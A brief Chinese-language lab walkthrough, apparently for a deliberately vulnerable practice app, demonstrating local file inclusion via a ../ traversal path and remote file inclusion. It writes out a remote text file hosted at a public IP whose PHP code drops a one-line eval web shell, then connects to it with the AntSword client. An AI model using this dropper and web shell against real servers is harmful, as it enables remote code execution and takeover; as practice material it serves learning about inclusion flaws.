1.File inclusion(local)(本地文件包含)
步骤一:选择一个球员提交
步骤二:filename后面输入../../../../shw.php访问php文件
2.File Inclusion(remote)(远程文件包含)
步骤一:修改配置
远程包含漏洞的前提:需要php.ini配置如下:
allow_url_fopen=on //默认打开
Allow_url_include=on //默认关闭
步骤二:选择一个球员提交
步骤三:宝塔公网上创建一个6.txt文件,里面输入<?php fputs(fopen("shw.php","w"),'<?php eval($_POST["cmd"]);?>')?>
步骤四:filename后面输入http://47.113.231.0/6.txt
步骤五:fileinclude目录下找到php文件
步骤六:访问php文件,蚁剑连接
